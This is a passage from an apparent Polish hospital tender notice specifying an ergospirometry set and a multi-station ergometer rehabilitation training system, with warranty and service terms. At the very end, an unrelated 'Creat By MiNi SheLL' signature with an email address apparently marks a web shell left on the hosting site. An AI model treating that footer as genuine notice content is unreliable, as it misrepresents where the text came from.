5.4 Standardowa i rozszerzona spirometria wg standardów ATS/ERS 2005, pomiary min.: FVC, FEV1, PEFR, FEV6, ERV, pętle PFV, VC, IC, SVC, MVV, RR, VO2, VO2/kg, VCO2, RQ, HR, WATT, VE, VEO2, VT, SPO2;
5.5 Bieżąca prezentacja graficzna na ekranie monitora w postaci tabularycznej i wykresów wybranych przez użytkownika parametrów otrzymywanych wyników pomiarowych; 
5.6 Kalibracja przepływomierza dla różnych zakresów pomiarowych;
5.7 Automatyczna kalibracja analizatorów gazowych;
5.8 System automatycznej kontroli jakości wykonywanych pomiarów oraz  kalibracji; 
5.9 Rozbudowana biblioteka wzorcowych dedykowanych raportów końcowych z możliwością tworzenia własnych raportów;
5.10 Możliwość podłączenia przystawki do prób prowokacyjnych z lekami;
5.11 Impedancyjny czujnik przepływu;
5.12 Elektrochemiczny czujnik stężenia tlenu (O2);
5.13 Pomiar wydatku energetycznego;
5.14 Niedyspersyjny czujnik stężenia dwutlenku węgla (CO2);
5.15 Zakresy pomiarowe:
Dla O2 minimum 0-100% z dokładnością +/- 0,02% lub wyższą,
Dla CO2 minimum 0-15% z dokładnością +/- 0,02% lub wyższą,
Dla przepływu minimum 0-16 l/sek z dokładnością +/- 0,3%;
5.16 Zakres rozdzielczości pomiaru:
Dla O2 i CO2  minimum 0,01%
Dla przepływu minimum 0,003 l/sek; 
5.17 PC, drukarka kolorowa, monitor LCD typu Medical  Grade  min. 17 cali; 
5.18 Wózek z transformatorem i pokrowcami na butle kalibracyjne;
5.19 Protokoły sterowania kompatybilne z systemem wysiłkowym;
5.20 Zestaw wyposażony w akcesoria startowe do wykonywania badań ergospirometrycznych; 
5.21 Butle kalibracyjne o pojemności 88 litrów;
5.22 Awaryjny zasilacz typu UPS;
6. Warunki gwarancji i serwisu:  
6.1 Okres gwarancji - min 24 miesiące; 
6.2 Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika;
6.3 Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat
6.4 Bezpłatne szkolenie pracowników Zamawiającego  obsługującego urządzenie;
6.5 Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
6.6 Zestaw do  ergospirometrii zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji); 
6.7 Bezpłatna instalacja urządzenia; 
6.8 Numer kontaktowy z serwisem Wykonawcy;
6.9 Sposób dezynfekcji urządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6 - dostawa 1 kpl. systemu treningu ergometrycznego z ergometrami rehabilitacyjnymi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 6 - System treningu ergometrycznego (rehabilitacji kardiologicznej) z ergometrami rehabilitacyjnymi   -  1 kpl.:<br>
1.  Ergometr rowerowy - 5 szt.;
1.1 Zakres obciążeń 20 - 999 W;
1.2 Zakres obrotów min. 30 - 130 obr/min;
1.3 Waga ergometru max 70 kg;
1.4 Wbudowany ekran LCD do prezentacji danych oraz parametrów treningu;
1.5 Niezależne wyświetlacze informacyjne dla pacjenta oraz dla obsługi;
1.6 Możliwość kalibracji softwarowej przy pomocy wbudowanej klawiatury przy pomocy niezależnego wzorca masy;
1.7 Złącze RS-232 - 3 porty, port analogowy; 
2. System sterujący z oprogramowanie 1 kpl.;
2.1 Pełna kontrola oraz programowanie treningu ze stanowiska sterującego;
2.2 Możliwość indywidualnego programowania treningu dla każdego z ergometrów ze stanowiska sterującego;
2.3 Możliwość zaprogramowania stałej fazy rozgrzewki;
2.4 Różne rodzaje treningów:
-	trening interwałowy
-	trening sterowany tętnem
-	trening ze stałym obciążeniem;
2.5 Prezentacja wszystkich danych treningu wraz z krzywą EKG na centralnym monitorze stanowiska sterującego;
2.6 Prezentacja na monitorze zestawu sterującego PC aktualnych parametrów treningu dla każdego z ergometrów:
-	wartości obciążenia
-	wartości tętna
-	krzywej EKG;
2.7 Możliwość zmiany obciążenia w trakcie treningu na każdym z ergometrów ze stanowiska sterującego;
2.8 Możliwość zaprogramowania indywidualnych procedur treningowych;
2.9 Zintegrowana baza danych pacjentów;
2.10 Możliwość wydruku diagramów treningowych; 
2.11 Możliwość rozszerzenia systemu do 16 stanowisk sterowanych z jednego komputera sterującego;
2.12 Awaryjny zasilacz typu UPS;
3. Warunki gwarancji i serwisu;
3.1 Okres gwarancji - min 24 miesiące;
3.2 Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika;
3.3 Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat;
3.4 Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie;
3.5 Bezpłatna instalacja urządzeń; 
3.6 Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
3.7 System treningu ergometrycznego zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji); 
3.8 Numer kontaktowy z serwisem Wykonawcy;
3.9 Sposób dezynfekcji urządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com